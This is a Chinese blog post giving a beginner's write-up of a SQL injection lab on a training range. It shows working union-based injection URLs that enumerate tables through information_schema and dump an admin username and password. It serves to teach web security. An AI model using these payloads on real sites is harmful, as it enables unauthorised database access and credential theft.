渗透第一课学习解题过程

最新推荐文章于 2021-10-27 16:32:37 发布
最新推荐文章于 2021-10-27 16:32:37 发布
阅读量658 收藏 3
点赞数
分类专栏: 渗透学习 文章标签: 渗透学习 WEB安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37327261/article/details/87883852
版权

重要说明:本文作为学习笔记,仅用于学习交流,请勿用于其它用途,侵删。

目标靶场:http://117.41.229.122:8003/?id=1,此靶场是腾讯课堂免费课程中的演习靶场,此笔记较为基础,请大牛勿喷

先找注点,经过测试

加单引号  '  不正常

加 and 1=1 正常、加 and 1=2不正常

由此可证明  ?id=1 后面的全被执行了,此处存在注入

利用order by子句进行快速猜解表中的列数,再配合union select语句进行回显。可以通过修改order参数值,再依据回显情况来判断具体表中包含的列数。

 http://117.41.229.122:8003/?id=1%20and%201=1%20order%20by%202 这串URL仔细看就能看明白,首先大家要知道 空格在经过编码后变成了%20,那么这串URL经过解码后是

http://117.41.229.122:8003/?id=1 and 1=1 order by 2

order by 2 返回正常页面,就意味着此页面的列数为2

在不知道列名的情况下可以通过列的的序号来指代相应的列。

我们用union select来回显看下

http://117.41.229.122:8003/?id=1 and 1=2 union select 1,2

这里请注意了,我为什么用 and 1=2呢?

那是因为,如果我用and 1=1,那么结果为真,页面就是正常显示,我后面select里面的参数就无法回显,所以要让页面不正常,那么我就可以找到回显的列的位置。

由上图可看到,第二个参数2显示在了网页中,那就证明正常的新闻是取的表中第二列的数据,这个数据不是我们关心的,我们是要拿到数据库中更隐私的信息,但是我们可以利用这个数据回显的位置来显示我们想要的数据。

首先我们就爆数据库版本号,假设我通过测试得知这是mysql数据库,至于怎么测试目标站是什么数据库,这个这里就不记录了,网上都有。

使用version()爆数据库版本号

http://117.41.229.122:8003/?id=1 and 1=2 union select 1,version()

版本号:5.5.53
使用database()爆数据库名称

http://117.41.229.122:8003/?id=1 and 1=2 union select 1,database()

数据库名称:maoshe

如下图两个结果

 我知道5.5.53的mysql有数据库叫做information_schema,里面有两个表非常有意思,它存储了所有数据库的名称、表。我们就通过这个来查询获得我们要的信息。

mysql自带的数据库information_schema,以及两张可以帮到我们的表tables,columns

tables表中的table_schema列,是存储数据库名称的

tables表中的table_name列,是存储表名的

columns表中的table_schema列,是存储数据库名称的

columns表中的table_name列,是存储表名的

columns表中的column_name列,是存储列名的。

通过以上的信息我们就可以构造一个sql语句获取到目标数据库的所有表名。

group_concat()函数可以将多个字符串连接成一个字符串,默认分隔符为逗号  ,

 http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

maoshe数据库中的所有表为

admin,dirs,news,xss

其中,damin表属于敏感表,一般存储用户账号密码。

有数据库名,有表名了我们就继续爆某个表的列名。继续构造SQL

 http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin'

admin表中的列为

Id,username,password

 到这里的时候,我们再想爆出我们要的Flag,就只剩一墙之隔了。

再构造一条SQL用来爆出表的值

 http://117.41.229.122:8003/?id=1 and 1=2 union select 1,group_concat(id,',',username,',',password) from admin

由此可得

ID:1   

username:admin

password:hellohack

通关秘钥为:hellohack

 

会说话的溜溜梅
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ZVulDrill通关教程
锋刃科技的博客
05-05 2458
创建zvuldrill数据库,然后把ZVulDrill/sys/zvuldrill.sql上传进去执行 修改sys/config.php的数据库账号密码 看到页面了 首先是搜索框这里有sql注入,给个单引号爆出错误 直接查询即可x' union select 1,database(),user(),4-- - 看看源码,这里是没有任何过滤就拿去查询了 当然还有个...
学习首次渗透过程以及总结
nini_boom的博客
08-27 459
谈不上思路,就只是工具和流程直接堆。 一、准备工具 1、工具 Nessus AWVS Appscan burpsuite sqlmap Hydra 2、字典 github上的,已经关注。 在线定制 pydictor somd5 提供的字典 二、信息搜集 不知道具体做什么,就是我现在的情况。但是渗透测试和开发不一样,有明显的突破口和方向,但是要忙起来,怎么忙?就照这个流程走吧! 信息收集 这个...
渗透第二解题过程
qq_37327261的博客
02-26 307
重要说明:本文作为学习笔记,仅用于学习交流,请勿用于其它用途,侵删。 目标靶场:http://120.203.13.75:8001/shownews.asp?id=171,此靶场是腾讯堂免费程中的演习靶场,此笔记较为基础,请大牛勿喷 第二是基于第一所学的知识上进一步学习渗透,所以如果哪里我一笔带过没有详细说明,那就意味着该知识点为之前笔记的知识。 这次的笔记讲的是如果目标站点有WAF...
Sqlmap总结
05-14 289
Sqlmap: 一般注入流程: sqlmap -u "www.ONDragon.com/ONDragon?id=1" --dbs   查看所有数据库 sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库 sqlmap -u "www.ONDragon.com/OND...
ZVuldrill 黑客靶场 附带安装教程
01-26
平台中有10个挑战,包含的漏洞有: ·SQL注入 ·储存型和反射型XSS ·CSRF ·文件包含 ·后台弱口令 ·文件上传 ·目录遍历 ·权限跨越
小数乘法说稿PPT学习教案.pptx
10-02
教学内容基于人教版五年级上册第2至3页的例1和例2,配合练习一的第1至3题。 【知识目标】 1. 掌握小数乘整数的基本计算方法,能够正确进行笔算,并对计算过程进行合理解释。 2. 理解以元为单位的小数乘法可以转换...
河南省固始县张广乡第一中学七年级数学下册8.1代入法解二元一次方程组教案新版新人教版
08-19
11. **代数式的转换**:在解题过程中,可以将一个方程转换为含一个未知数的表达式,例如X+Y=20可以得出Y=20-X,然后将此式代入另一个方程,实现消元。 综上所述,本节旨在通过代入法教授学生解决二元一次方程组,...
求一个数的几倍是多少教案(2).pdf
09-30
本节教学大纲是关于“求一个数的几倍是多少”的数学教学计划,旨在帮助学生理解和掌握求一个数的几倍是多少的数量关系,并能正确解答。以下是相关的知识点: 一、教学目标: 1. 在实际生活情境中感知和理解求...
六年级数学下册第二单元圆柱和圆锥第4时圆锥的体积教学件苏教版
09-09
在小学六年级数学下册的第二单元中,学生们将学习关于圆柱和圆锥的知识,特别是第四时的重点——圆锥的体积。本的教学目标是让学生能够通过实验推导出圆锥体积的计算公式,并能熟练应用公式解决实际问题。此外,...
2020秋九年级数学上册第二十四章圆24.4弧长及扇形的面积第1时弧长和扇形面积教案2新版新人教版
09-09
《2020秋九年级数学上册第二十四章圆24.4弧长及扇形的面积第1时弧长和扇形面积教案2新版新人教版》这一教学内容主要聚焦在初中数学中关于圆的弧长和扇形面积的理论与计算。这一章节的目标是帮助学生掌握弧长和扇形...
黑客靶场之ZVuldrill 附带安装教程
12-14
黑客靶场之ZVuldrill 附带安装教程 基于本地的渗透测试环境 提高自己对网络攻防的基本认识和增加自己的动手能力。基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。
第一次靶场练习:SQL注入(1)
weixin_30872733的博客
01-11 186
SQL注入1 本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责 一、学习目的: 利用手工注入网站 利用sqlmab注入 二、附件说明 靶场网址:http://117.41.229.122:8003/?id=1 工具sqlmap下载:https://download.csdn.net/download/qq_41803637/1091...
ZVulDrill安装及通关教程
m0_46371267的博客
10-27 4509
一、安装 1、首先下载一下该安装包 下载链接:https://github.com/710leo/ZVulDrill 2、下载一个phpstudy 下载链接:https://www.xp.cn/download.html 根据自己得个人下载一个适合得版本,默认是下载到d盘 注:phpstudy为一个集成得环境非常得方便,包含了apache、mysql等环境,包括pikachu等都可以用phpstudy来搭建 3、将下载好的压缩包解压至phpstudy下面得www目录下面 4、修改文件密码 修改一下sys目录
ZvulDrill靶场
qq_43400414的博客
03-26 2610
title: ‘ZVulDrill靶场’ date: 2019-03-13 20:40:06 tags: [靶场,代码审计] 最近遇到了一个靶场 #ZVuldrill靶场练习 靶场下载链接 ###(1)SQL注入查询数据库信息 打开一看,有个很显眼的搜索留言的框框,随便输入了一个1,发现URL变成了 ‘http://localhost/ZVulDrill/search.php?search=1...
ZVulDrill靶场通关笔记
weixin_41487522的博客
12-07 1912
ZVulDirll靶场通关笔记 由于读研期间在忙论文的事情,好久没更新了,今天分享一下ZVulDirll靶场的通关。 这个靶场是我在观看web安全相关程教学视频的时候发现的,靶场很简单,实用于新手小白学习入门,下面就是该靶场的通关笔记。 1.下载地址: github上源地址下载:https://github.com/710leo/ZVulDrill 2.环境搭建及安装: 环境搭建的话,推荐使用phpstudy,非常的方便,因为phpstudy集成了Apache+PHP+MySQL+phpMyAdmin+Z
在metasploitable里面搭建ZVulDrill
豆傻小饼干随记
11-18 817
首先通过ssh连接到metasploitable 然后将文件导入到/var/www/里面: 然后修改一下属组: chmod 755 ZVulDrill/ chownwww-data.www-data ZVulDrill/ 然后修改sys文件夹下的config.php,修改一下root密码,设置成自己的密码,之后进入到数据库,添加专用数据库: mysql -u root -p ...
【绿盟大讲堂】 渗透测试流程解析
weixin_30558305的博客
02-28 1042
4 months ago游江 阅读:1,100 渗透测试的标准流程,你get到了吗? 文章目录 一、渗透测试相关名词解析 二、渗透测试流程 一般渗透测试流程 2.1 明确目标 2.2 信息收集 2.3 漏洞探索 2.4 漏洞验证 2.5 信息分析 2.6 获取所需 2.7 信息整理 2.8 形成报告 2.9 流程...
新手学习渗透测试的入门指南
热门推荐
46的十哥哥的5哥哥
11-16 1万+
渗透测试入门手册 本手册将持续更新!这是20190707版 如果觉得本文有用,请高抬贵手分享给你的朋友。 渗透测试是什么? 维基百科的释义:https://zh.wikipedia.org/wiki/渗透测试 百度百科的释义:https://baike.baidu.com/item/渗透测试 5号黯区的释义:我们理解的渗透测试是通过各种手段对目标进行一次渗透(攻击),通过渗透来测试目标...
Metasploit渗透测试学习笔记——5、渗透攻击流程
Fly_鹏程万里
05-16 4894
Metasploit渗透攻击基础Metasploit中有数百个模块,没有人可以将他们全部都记下来,但是你可以在使用的时候使用msf终端命令“show”获取详细的信息,本小节主要为大家讲解一些Metasploit中的常用的命令格式与语句:(1)msf>show  exploits命令含义:显示Metasploit框架中所有可以使用的渗透攻击模块。(2)msf>show  auxiliar...
写一段 复变函数的解题过程
最新发布
03-08
复变函数的解题过程需要根据具体的题目来进行分析和解答。一般来说,我们需要先确定函数的定义域和值域,然后根据函数的性质和公式进行运算和推导,最终得出解答。例如,对于一个复变函数f(z)=z^2+1,我们可以先确定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值